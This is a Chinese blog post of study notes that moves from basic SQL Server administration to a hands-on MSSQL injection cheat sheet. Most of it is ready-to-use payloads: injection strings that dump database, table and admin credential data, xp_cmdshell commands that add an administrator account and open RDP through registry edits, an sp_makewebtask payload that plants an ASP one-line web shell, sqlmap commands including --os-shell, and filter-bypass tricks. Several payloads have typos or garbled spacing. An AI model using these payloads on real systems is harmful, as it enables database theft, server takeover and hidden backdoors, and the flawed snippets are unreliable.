数据库
首页 > 数据库> > Mssql注入漏洞认识

Mssql注入漏洞认识

作者:互联网

用的asp、aspx可能用的mssql

sql server2012

特点:

高性能,可充分利用win的优势

系统管理先进,支持win图形化管理工具,支持本地和远程的系统管理和配置

强壮的事务处理功能,采用各种方法保证数据的完整性

支持对称多处理器结构、存储过程、ODBC,并且有自主的SQL语言。sqlserver以内置的数据复制功能、强大的管理工具、与因特尔的紧密集成和开放系统结构为用户、等提供的数据库平台

sqlserver端口1433

管理员账号sa

hydra s.exe

mdf是数据库文件

ldf是数据库的日志文件

sql server2008使用方法

登陆方式两种
win、sql server
创建数据库,右击新建数据库
起名字
点击名字
创建表:右击表,新建表
指定表里的列
例如:
id、int
username、nvachar(50)
然后ctrl+s完成并编辑名字,dbo是附加的前缀,然后点击创建的表,然后进行创建用户
按照命令查询也可以
新建查询
use 数据库			点击执行
然后查询admin的所有列
select * from admin;
查询id=1的
select * from admin where id=1
插入内容
insert into admin(id,username,password)value(3,'test','password');
改密码更改3的密码
update admin set password='123123' where id =3
删除
delete from admin where id=3

要想删除数据库,首先右键任务--分离,然后全选,然后确定删除后,找mssql的,再把数据库的路径的对应的删除就行了

版本注意数据库的兼容问题,2003强行附加带2008会出现一些问题

数据库的附加:

右击数据库,点击附加,然后添加,找到数据库的路径点击mdf的,然后确定

版本问题:

右击数据库,点击生成脚本,然后选择版本 、

用户名的服务器角色sysadmin就是sa权限

要想下载数据库,就得先分离才能继续复制、移动

mssql数据库权限

sa权限:数据库操作,文件管理,命令执行,注册表读取等system
db权限:文件管理,数据库操作等users-adminstrators
public权限:数据库操作 guest-users

一般数据库代码都是在conn.asp或者dbconfig.asp 这是asp

aspx的一般在web.config

mssql数据库注入

判断有无注入

and 1=1
and 1=2
/
-0

因为代码没有对输入做出严格的过滤产生的

初步判断是否是mssql

and user>0

判断数据库系统

and(select count(*)from sysobjects)>0  mssql
and(select count(*)from msysobjects)>0    access

测试权限结构

and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
and 1=(select IS_MEMBER('db_owner'));--

查看数据库版本信息

and 1=(select @@version)
也可以
id=@@version

获取第一个用户的数据库

and 1=(select top 1 name from master..sysdatebases where dbid>4)

获取第一个张表明

and 1=(select top 1 name from sysobjects where xtype='u')

不等于用闭合的

name<>'名称'

爆数据库

and 1=(select name from master..sysdatebases for xml path)

爆数据库表

and 1=(select name from sysobjects for xml path)

获取第一列的列名

and 1=(select top 1 name from syscolumns where id =(select id from sysobjects where name ='users'))

然后查看用户名密码

and 1=(select top 1 admin from admin)
and 1=(select top 1 pass from admin)

利用mssql扩展存储注入攻击

1.检测与恢复扩展存储
判断xp_cmdshell扩展存储是否存在
and 1=(select count(*) fron master.dbo.sysobjects where xtype = 'X' AND name='xp cmdshell')
判断xp_regread扩展存储过程是否存在
and 1=(select count(*) from master.dbo.sysobjects where name='xp_regread')恢复
EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC
sp_configure'xp_cmdshell', 1;RECONFIGURE;
;exec sp_dropextendedproc xp_cmdshell,'xplog70.dll'

利用xp_cmdshell扩展执行任意命令

;drop table black
;create TABLE black(mulu varchar(7996) NULL,ID int NOT NULL IDENTITY(1,1))--;insert into black exec master..xp_cmdshell 'dir c:\'
and 1= (select top 1 mulu from black where id=1)

新建用户

;exec master..xp_cmdshell 'net user test test /add  新建用户
加入到管理员权限
;exec master..xp_cmdshell 'net localgroup administrators test /add'

远程登录cmd

mstsc

远程没开启,就让他开

打开3389

;exec master..xp_cmdshell 'sc config termservice start=auto'
;exec master..xp_cmdshell 'net start termservice'
; e x e c   m a s t e r . .x p_c m d s h e l l 'r e g   a d d"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"/vfDenyTSConnections/t REG_DWORD/d 0x0 /f’//允许外部连接
; e x e c   m a s t e r . .x p_c m d s h e l l 'r e g a   d d"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD/d 0x50/f‘ //改端口到80
添加和删除一个SA权限的用户test:(需要SA权限)
exec master.dbo.sp_addlogin test,password
exec master.dbo.sp_addsrvrolemember test,sysadmin
停掉或激活某个服务。(需要SA权限)
exec master..xp_servicecontrol'stop','schedule'
exec master..xp_servicecontrol'start','schedule'

开启远程数据库1
;select* from OPENROWSET('SQLOLEDB','server=servername;uid=sa;pwd=apachy_123','select * from table1')
开启远程数据库2
;select* from OPENROWSET('SQLOLEDB','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’,'select *from table'

利用sp_makewebtask写入一句话

;exec sp_makewebtask
'c.\inetpub\wwwroot\x.asp','select"%3C%25%65%76%61%6C%20%72%65%71%75%65%73%74%28%22%63%68%6F%70%70%65%72%22%29%25%3E""--
http://mssql.sql.com/aspx.aspx?id=1%20;exec%20sp_makewebtask%20%20%27c.\inetpub\wwwroot\ms\×1.asp%27,%27select%27%27<%execute(request("cmd"")%>%27%27%27--
注意上面的url编码后,看ms,更改为网站的端口
修改管理员密码
update admin set password=123123 where username='admin';

通过共聚getwebshell增强版

插入代码

('<%excute(request("cmd"))%>')--

注意网站根目录

也可以用一键备份

用sqlmap跑

sqlmap.py -u "192.168.0.1:8082/test.aspx?id=1" --is-dba
看权限是否是系统管理员权限
sqlmap.py -u "192.168.0.1:8082/test.aspx?id=1" --current-user
看当前用户名名称
sqlmap.py -u "192.168.0.1:8082/test.aspx?id=1" --privilegs
看权限
sqlmap.py -u "192.168.0.1:8082/test.aspx?id=1" --os-shell
执行系统命令
sqlmap.py -u "192.168.0.1:8082/test.aspx?id=1" --dbs
列出数据库
sqlmap.py -u "192.168.0.1:8082/test.aspx?id=1" --current-db
查看当前数据库
sqlmap.py -u "192.168.0.1:8082/test.aspx?id=1" --tables -D test --couent
统计每个表的数据
sqlmap.py -u "192.168.0.1:8082/test.aspx?id=1" --columns -T admin -D test
查看admin有哪些列
sqlmap.py -u "192.168.0.1:8082/test.aspx?id=1" --dump -C admin.pass -T -D test
指定表查看
sqlmap.py -u "192.168.0.1:8082/test.aspx?id=1" --dump  -T -D test
看所有的

防注入的代码

/**/
+
%0a
代替空格
还有大小写的区分的
selcet
大写
绕过
SELECT

标签:--,数据库,Mssql,漏洞,test,aspx,id,select,注入
来源: https://www.cnblogs.com/chenyouxiu/p/14968195.html